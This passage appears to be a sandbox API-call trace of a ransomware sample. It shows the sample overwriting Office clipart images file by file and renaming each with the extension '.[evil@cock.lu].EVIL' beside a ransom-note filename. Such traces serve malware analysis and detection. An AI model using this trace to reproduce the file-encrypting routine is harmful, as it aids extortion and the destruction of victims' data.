(lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG", dwFileAttributes=0x200) returned 0 [0145.125] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.125] wcsstr (_Str="J0145669.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.125] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 69 [0145.125] wcscmp (_String1="J0145669.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.125] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145669.JPG") returned 0x0 [0145.125] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG") returned 0x45 [0145.125] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.127] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c6a, lpOverlapped=0x0) returned 1 [0145.171] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.171] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.171] _errno () returned 0x84b1160840 [0145.171] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.171] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7c80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c80, lpOverlapped=0x0) returned 1 [0145.171] CloseHandle (hObject=0x1a8) returned 1 [0145.172] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.172] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.172] __uncaught_exception () returned 0x84b1160800 [0145.172] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.172] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg.[evil@cock.lu].evil")) returned 1 [0145.173] ??_V@YAXPEAX@Z () returned 0x1 [0145.175] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG", dwFileAttributes=0x200) returned 0 [0145.176] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.176] wcsstr (_Str="J0145707.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.176] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 69 [0145.176] wcscmp (_String1="J0145707.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.176] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145707.JPG") returned 0x0 [0145.176] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG") returned 0x45 [0145.176] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.177] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8fd4, lpOverlapped=0x0) returned 1 [0145.189] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.189] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.189] _errno () returned 0x84b1160840 [0145.190] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.190] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x8fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8fe0, lpOverlapped=0x0) returned 1 [0145.190] CloseHandle (hObject=0x1a8) returned 1 [0145.195] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.196] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.196] __uncaught_exception () returned 0x84b1160800 [0145.196] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.196] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg.[evil@cock.lu].evil")) returned 1 [0145.197] ??_V@YAXPEAX@Z () returned 0x1 [0145.199] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG", dwFileAttributes=0x200) returned 0 [0145.200] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.200] wcsstr (_Str="J0145810.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.200] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 69 [0145.200] wcscmp (_String1="J0145810.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.200] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145810.JPG") returned 0x0 [0145.200] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 0x45 [0145.200] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.201] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8fb8, lpOverlapped=0x0) returned 1 [0145.235] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.235] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.235] _errno () returned 0x84b1160840 [0145.236] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.236] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x8fc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8fc0, lpOverlapped=0x0) returned 1 [0145.236] CloseHandle (hObject=0x1a8) returned 1 [0145.236] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.236] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.236] __uncaught_exception () returned 0x84b1160800 [0145.236] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.237] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg.[evil@cock.lu].evil")) returned 1 [0145.238] ??_V@YAXPEAX@Z () returned 0x1 [0145.241] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG", dwFileAttributes=0x200) returned 0 [0145.241] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.241] wcsstr (_Str="J0145879.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.241] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 69 [0145.241] wcscmp (_String1="J0145879.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.241] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145879.JPG") returned 0x0 [0145.241] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 0x45 [0145.241] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.243] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8a5b, lpOverlapped=0x0) returned 1 [0145.246] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.246] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.246] _errno () returned 0x84b1160840 [0145.246] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.246] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x8a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8a60, lpOverlapped=0x0) returned 1 [0145.246] CloseHandle (hObject=0x1a8) returned 1 [0145.247] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.247] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.247] __uncaught_exception () returned 0x84b1160800 [0145.247] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.247] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg.[evil@cock.lu].evil")) returned 1 [0145.248] ??_V@YAXPEAX@Z () returned 0x1 [0145.251] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG", dwFileAttributes=0x200) returned 0 [0145.251] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.251] wcsstr (_Str="J0145895.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.251] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 69 [0145.251] wcscmp (_String1="J0145895.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.251] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145895.JPG") returned 0x0 [0145.252] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG") returned 0x45 [0145.252] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.253] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x84a6, lpOverlapped=0x0) returned 1 [0145.256] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.256] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.256] _errno () returned 0x84b1160840 [0145.256] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.256] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x84c0, lpOverlapped=0x0) returned 1 [0145.257] CloseHandle (hObject=0x1a8) returned 1 [0145.257] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.257] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.257] __uncaught_exception () returned 0x84b1160800 [0145.257] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.257] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg.[evil@cock.lu].evil")) returned 1 [0145.258] ??_V@YAXPEAX@Z () returned 0x1 [0145.261] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG", dwFileAttributes=0x200) returned 0 [0145.261] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.261] wcsstr (_Str="J0145904.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.261] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 69 [0145.261] wcscmp (_String1="J0145904.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.261] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145904.JPG") returned 0x0 [0145.261] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG") returned 0x45 [0145.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.264] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9a76, lpOverlapped=0x0) returned 1 [0145.277] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.277] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.277] _errno () returned 0x84b1160840 [0145.277] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.277] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9a80, lpOverlapped=0x0) returned 1 [0145.277] CloseHandle (hObject=0x1a8) returned 1 [0145.278] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.278] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.278] __uncaught_exception () returned 0x84b1160800 [0145.278] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.278] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg.[evil@cock.lu].evil")) returned 1 [0145.279] ??_V@YAXPEAX@Z () returned 0x1 [0145.282] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG", dwFileAttributes=0x200) returned 0 [0145.283] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.283] wcsstr (_Str="J0146142.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.283] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 69 [0145.283] wcscmp (_String1="J0146142.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.283] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0146142.JPG") returned 0x0 [0145.283] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 0x45 [0145.283] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.285] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb5ac, lpOverlapped=0x0) returned 1 [0145.288] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.288] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.288] _errno () returned 0x84b1160840 [0145.288] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.288] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xb5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb5c0, lpOverlapped=0x0) returned 1 [0145.288] CloseHandle (hObject=0x1a8) returned 1 [0145.288] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.289] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.289] __uncaught_exception () returned 0x84b1160800 [0145.289] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.289] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg.[evil@cock.lu].evil")) returned 1 [0145.290] ??_V@YAXPEAX@Z () returned 0x1 [0145.293] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG", dwFileAttributes=0x200) returned 0 [0145.293] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.293] wcsstr (_Str="J0148309.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.293] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 69 [0145.293] wcscmp (_String1="J0148309.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.293] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0148309.JPG") returned 0x0 [0145.293] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 0x45 [0145.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.296] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaa9a, lpOverlapped=0x0) returned 1 [0145.298] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.298] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.299] _errno () returned 0x84b1160840 [0145.299] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.299] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xaaa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaaa0, lpOverlapped=0x0) returned 1 [0145.299] CloseHandle (hObject=0x1a8) returned 1 [0145.299] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.299] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.299] __uncaught_exception () returned 0x84b1160800 [0145.299] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.300] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg.[evil@cock.lu].evil")) returned 1 [0145.300] ??_V@YAXPEAX@Z () returned 0x1 [0145.303] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG", dwFileAttributes=0x200) returned 0 [0145.304] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.304] wcsstr (_Str="J0148757.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.304] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG") returned 69 [0145.304] wcscmp 